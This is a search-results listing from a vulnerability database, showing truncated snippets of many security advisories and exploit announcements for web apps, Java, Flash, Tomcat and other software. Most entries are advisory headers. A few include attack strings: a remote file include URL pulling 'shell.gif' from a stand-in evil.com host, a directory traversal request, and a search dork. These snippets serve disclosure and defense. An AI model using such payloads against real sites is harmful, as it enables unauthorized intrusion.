Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2008/06/09 12:0 a.m.130 views

Akamai Technologies Security Advisory 2008-0003 (Akamai Client Software)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------- Akamai Technologies Security Advisory 2008-0003 Akamai ID: 2008-0003 Date: 2008/06/06 Product Name: Akamai Client Software formerly Red Swoosh Affected Versions: Up to and including 3322 Fixed...

7.1CVSS0.2AI score0.00773EPSS
Exploits1
securityvulns
securityvulns
added 2007/11/25 12:0 a.m.130 views

Mp3 ToolBox 1.0 beta 5 Remote File İnclude Vulnerability

+By CrackersChild+ Script.......: Mp3 ToolBox 1.0 beta 5 Download.....: http://www.radiotoolbox.com/downloads/mp3toolbox/mp3toolboxbeta-5.zip Author.......: CrackersChild | [email protected] & [email protected] Class........: Remote File nclude Vulnerability Dork.........: intitle:M...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2007/04/12 12:0 a.m.130 views

cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability

cattaDoc 2.21download2.php fn1Remote File Disclosure Vulnerability D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz Discovered by: GolDM = Mahmoodali Homepage: http://www.Tryag.cc Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group V.Code: $tp = $REQUEST'mtp'; $ofn =...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2007/01/25 12:0 a.m.130 views

EzDatabase Multiple Cross-Site Scripting Vulnerability

EzDatabase Multiple Cross-Site Scripting Vulnerability Written in PHP and MySQL, ezDatabase is the foundation for your online databases. It is a powerful web based application that allows users with basic HTML knowledge to create online databases for their website. ezDatabase will do the hard wor...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/07/24 12:0 a.m.130 views

MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

--------------------------------------------------------------------------------- MiniBB Forum = 1.5a Remote File Include Vulnerabilities --------------------------------------------------------------------------------- Author : Matdhule Contact : [email protected] Application : MiniBB Forum...

2.1AI score
Exploits0
securityvulns
securityvulns
added 2006/07/08 12:0 a.m.130 views

Sparklet game format string vulnerabilitity

Format string vulnerability on player name displaying...

2.2AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2003/10/10 12:0 a.m.130 views

Переполнение буфера при обработке структуры макроса

Затронутые продукты: Microsoft Word 97, Microsoft Word 2000 SR-1. В Microsoft Word XP этот баг пофиксен. При обработке документа Microsoft Word, содержащего макросы, может произойти переполнение буфера в стеке. Анализ недокументированной структуры макроса в документе, осуществляемый процессом...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2000/11/24 12:0 a.m.130 views

RESIN ServletExec JSP Source Disclosure Vulnerability(IIS 5)

Resintm serves the fastest servlets and JSP. With Java and JavaScript support, Resin gives web applications the flexibility to choose the right language for the task. Resin's leading XSL XML stylesheet language support encourages separation of content from formatting. Resin provides a fast servle...

6.7AI score
Exploits0
securityvulns
securityvulns
added 2000/06/28 12:0 a.m.130 views

Concerning the LDAP Enabled Netscape FTP Server

Over the last few days a great number of people have mailed us in regards to the "Netscape Professional Services FTP Server Vulnerability" http://www.securityfocus.com/bid/1375 discovered by Michal Zalewski [email protected] and posted to the Bugtraq mailing list on Wed, 21 Jun 2000. The following...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2000/04/20 12:0 a.m.130 views

Cisco Catalist позволяет любому пользователю получить администраторские привелегии.

В версии П/О 5.41 можно обойти проверку enable-пароля. Исправлено в 5.42...

0.7AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2015/03/21 12:0 a.m.129 views

Security Audit Notes: OpenSSL d1_srvr.c Overflow - Advanced Information Security

-= Advanced Information Security Corporation =- ------------------------------------------------------------------------ Author: Nicholas Lemonias Type: Security Audit Notes Date: 17/3/2015 Email: lem.nikolas at gmail dot com Audit: OpenSSL v1.0.2 22nd of January, 2015 Release...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2014/09/15 12:0 a.m.129 views

[SECURITY] CVE-2013-4444 Remote Code Execution in Apache Tomcat

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2013-4444 Remote Code Execution Severity: Important Vendor: The Apache Software Foundation Versions Affected: - - Apache Tomcat 7.0.0 to 7.0.39 Description: In very limited circumstances, it was possible for an attacker to upload a malicious JSP t...

6.8CVSS8.8AI score0.1399EPSS
Exploits0
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.129 views

Remote Code Execution in Microweber

Advisory ID: HTB23175 Product: Microweber Vendor: Microweber Vulnerable Versions: 0.8 and probably prior Tested Version: 0.8 Advisory Publication: September 25, 2013 without technical details Vendor Notification: September 25, 2013 Vendor Patch: September 26, 2013 Public Disclosure: October 16,...

6.4CVSS0.3AI score0.02823EPSS
Exploits2
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.129 views

Cross-Site Scripting (XSS) in Zikula Application Framework

Advisory ID: HTB23178 Product: Zikula Application Framework Vendor: Zikula Software Foundation Vulnerable Versions: 1.3.5 build 20 and probably prior Tested Version: 1.3.5 build 20 Advisory Publication: October 16, 2013 without technical details Vendor Notification: October 16, 2013 Vendor Patch:...

4.3CVSS6.3AI score0.0122EPSS
Exploits3
securityvulns
securityvulns
added 2012/11/02 12:0 a.m.129 views

PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities

Title: ====== PG Dating Pro v1.0 CMS - Multiple Web Vulnerabilities Date: ===== 2012-10-29 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=736 VL-ID: ===== 736 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: =============...

8.7AI score
Exploits0
securityvulns
securityvulns
added 2012/10/30 12:0 a.m.129 views

[security bulletin] HPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03538957 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03538957 Version: 1 HPSBUX02825...

0.5AI score0.12471EPSS
Exploits1
securityvulns
securityvulns
added 2012/08/13 12:0 a.m.129 views

[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities

Title: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities Affected Software: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 Description: Openconstructor...

6.5CVSS0.4AI score0.0092EPSS
Exploits6
securityvulns
securityvulns
added 2012/07/23 12:0 a.m.129 views

Jrobalian CMS SQL Injection Vulnerability

===================================================== Jrobalian CMS SQL Injection Vulnerability ===================================================== :----------------------------------------------------------------------------------------------------------------------------------------: :...

8.3AI score
Exploits0
securityvulns
securityvulns
added 2012/02/16 12:0 a.m.129 views

http://www.adobe.com/support/security/bulletins/apsb12-03.html

Security update available for Adobe Flash Player Release date: February 15, 2012 Vulnerability identifier: APSB12-03 CVE number: CVE-2012-0751, CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756, CVE-2012-0767 Platform: All Platforms SUMMARY This update addresses critical...

10CVSS1.1AI score0.9203EPSS
Exploits13
securityvulns
securityvulns
added 2011/10/15 12:0 a.m.129 views

APPLE-SA-2011-10-12-4 Safari 5.1.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-4 Safari 5.1.1 Safari 5.1.1 is now available and addresses the following: Safari Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.2, OS X Lion Server v10.7.2, Windows 7, Vista, XP SP2 or later Impact:...

9.3CVSS9.6AI score0.50213EPSS
Exploits15
securityvulns
securityvulns
added 2011/08/10 12:0 a.m.129 views

[security bulletin] HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02942411 Version: 1 HPSBMU02695 SSRT100480 rev.1 - HP OpenView Performance Insight, Remote HTML Injection, Unauthorized Access NOTICE: The information in this Security Bulletin should be acted up...

6.4CVSS0.8AI score0.02519EPSS
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.129 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.129 views

ZDI-11-189: Oracle Java ICC Profile ncl2 DevCoords Tag Parsing Remote Code Execution Vulnerability

ZDI-11-189: Oracle Java ICC Profile ncl2 DevCoords Tag Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-189 June 8, 2011 -- CVE ID: CVE-2011-0862 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Oracle -- Affected Products: Oracle Java...

10CVSS0.7AI score0.06277EPSS
Exploits0
securityvulns
securityvulns
added 2011/05/08 12:0 a.m.129 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits0
securityvulns
securityvulns
added 2011/04/11 12:0 a.m.129 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.8CVSS1.6AI score0.38775EPSS
Exploits0References17Affected Software5
securityvulns
securityvulns
added 2010/12/14 12:0 a.m.129 views

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2010/12/12 12:0 a.m.129 views

www.eVuln.com : Non-persistent XSS in slickMsg

www.eVuln.com advisory: Non-persistent XSS in slickMsg Summary: http://evuln.com/vulns/159/summary.html Details: http://evuln.com/vulns/159/description.html -----------Summary----------- eVuln ID: EV0159 Software: slickMsg Version: 0.7-alpha Critical Level: low Type: Cross Site Scripting Status:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2010/10/28 12:0 a.m.129 views

LFI in DZCP

Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Fixed by Vendor Risk level: High Credit: High-Tech...

6.5AI score
Exploits0
securityvulns
securityvulns
added 2010/06/25 12:0 a.m.129 views

Mozilla Foundation Security Advisory 2010-28

Mozilla Foundation Security Advisory 2010-28 Title: Freed object reuse across plugin instances Impact: Critical Announced: June 22, 2010 Reporter: Microsoft Vulnerability Research Products: Firefox, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 SeaMonkey 2.0.5 Description Microsoft Vulnerabili...

9.3CVSS0.4AI score0.04812EPSS
Exploits0
securityvulns
securityvulns
added 2010/01/21 12:0 a.m.129 views

eWebeditor Directory Traversal Vulnerability

Securitylab.ir Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./.. Discoverd By: Pouya Daneshmand Website: http://securitylab.ir Contacts:...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2009/11/17 12:0 a.m.129 views

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

http://www.efblog.net/2009/11/avast-aswrdrsys-kernel-pool-corruption.html =============Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation================ Authors: Giuseppe 'Evilcry' Bonfa' AbdulAziz Hariri E-Mail: evilcry AT GMAIL DOT COM Website: http://evilcry.netsons.org...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2009/11/11 12:0 a.m.129 views

[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News

MorningStar Security - Advisory http://www.morningstarsecurity.com/ Multiple security issues in Cute News and UTF-8 Cute News 1. Advisory Information ------------------------------------------------------------------------------------------------------------------------ Title: Multiple security...

7AI score
Exploits0
securityvulns
securityvulns
added 2009/04/17 12:0 a.m.129 views

Geeklog <= 1.5.2 savepreferences()/*blocks[] remote sql injection exploit

?php / Geeklog = 1.5.2 savepreferences/blocks remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if isset...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2009/04/10 12:0 a.m.129 views

Adgregate ShopAd widget validation is vulnerable to replay attack

Adgregate is a "TechCrunch 50" startup that recently signed a distribution deal with Google/DoubleClick 1. As a service, they offer a "viral widget" intended to be hosted on untrusted third-party sites through which consumers can enter their credit card information. According to their website, th...

1AI score
Exploits0
securityvulns
securityvulns
added 2009/01/15 12:0 a.m.129 views

US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/12/15 12:0 a.m.129 views

Multiple XSS Vulnerabilities in World Recipe 2.11

Armorize Technologies Security Advisory Armorize-ADV-2008-0001 Title: Multiple XSS Vulnerabilities in World Recipe 2.11 Date: 2008/12/15 Status: Full Class: Input Validation Error Bugtraq ID: N/A Category: Cross Site Scripting Language: ASP.NET C Description Armorize-ADV-2008-0001 discloses...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2008/10/03 12:0 a.m.129 views

[USN-649-1] OpenSSH vulnerabilities

=========================================================== Ubuntu Security Notice USN-649-1 October 01, 2008 openssh vulnerabilities CVE-2008-1657, CVE-2008-4109 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS...

6.5CVSS0.2AI score0.28601EPSS
Exploits9
securityvulns
securityvulns
added 2008/08/01 12:0 a.m.129 views

Atmail Remote Authentication Bypass, Full DB Compromise

@Mail PHP Version 5.41 patch Release http://atmail.com/demo/atmailphpdemo.tgz The default install of Atmail 5.41 creates the following file in the atmail/ directory: build-plesk-upgrade.php If that file is called via http, such as: http://example.com/atmail/build-plesk-upgrade.php it will execute...

7AI score
Exploits0
securityvulns
securityvulns
added 2008/05/22 12:0 a.m.129 views

ZDI-08-029: Trillian AIM.DLL Long HTML Font Parameter Stack Overflow Vulnerability

ZDI-08-029: Trillian AIM.DLL Long HTML Font Parameter Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-029 May 21, 2008 -- Affected Vendors: Cerulean Studios -- Affected Products: Cerulean Studios Trillian -- TippingPointTM IPS Customer Protection: TippingPoint IPS...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/05/20 12:0 a.m.129 views

Starsgames Control Panel <= 4.6.2 Remote XSS Vulnerability

========================================================== Starsgames Control Panel = 4.6.2 Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 19 May 2008 SITE : www.citec.us APPLICATION : Starsgames Control Panel VERSION : = 4.6.2...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2008/04/27 12:0 a.m.129 views

Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wordpress 2.5 Cookie Integrity Protection Vulnerability Original release date: 2008-04-25 Last revised: 2008-04-25 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt CVE ID: CVE-2008-1930 Source: Steven J. Murdoch http://www.cl.cam.ac.uk/users/sjm217/...

7.5CVSS0.8AI score0.05001EPSS
Exploits3
securityvulns
securityvulns
added 2007/12/24 12:0 a.m.129 views

[CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability

Title: CAID 35970: CA Products That Embed Ingres Authentication Vulnerability CA Vuln ID CAID: 35970 CA Advisory Date: 2007-12-19 Reported By: Ingres Corporation Impact: Attacker can gain elevated privileges. Summary: A potential vulnerability exists in the Ingres software that is embedded in...

5CVSS6AI score0.01814EPSS
Exploits1
securityvulns
securityvulns
added 2007/12/07 12:0 a.m.129 views

[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01188923 Version: 1 HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager OV NNM Remote Unauthorized Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should...

10CVSS0.7AI score0.69613EPSS
Exploits9
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.129 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2006/11/28 12:0 a.m.129 views

tar archiver directory traversal

Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/11/11 12:0 a.m.129 views

Avahi privilege escalation

Insufficient Netlink parameters validation allow to manipulate server parameters...

5.1AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/11/09 12:0 a.m.129 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/10/13 12:0 a.m.129 views

ExtCalThai_Component <= 0.9.1 Remote File Inclusion

ExtCalThaiComponent = 0.9.1 Remote File Inclusion Download Source : http://mamboxchange.com/frs/download.php/6004/ExtCalThaiComponentv0.9.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; adminevents.php extcalendar.p mail.inc.phphp bugs ; at -...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2006/10/11 12:0 a.m.129 views

7 php scripts File Inclusion / Source disclosure Vuln

Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2006/09/14 12:0 a.m.129 views

[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

====================================================================== Secunia Research 14/09/2006 - Tagger LE PHP "eval" Injection Vulnerabilities - ====================================================================== Table of Contents Affected...

7.5CVSS0.6AI score0.08205EPSS
Exploits1
Total number of security vulnerabilities5000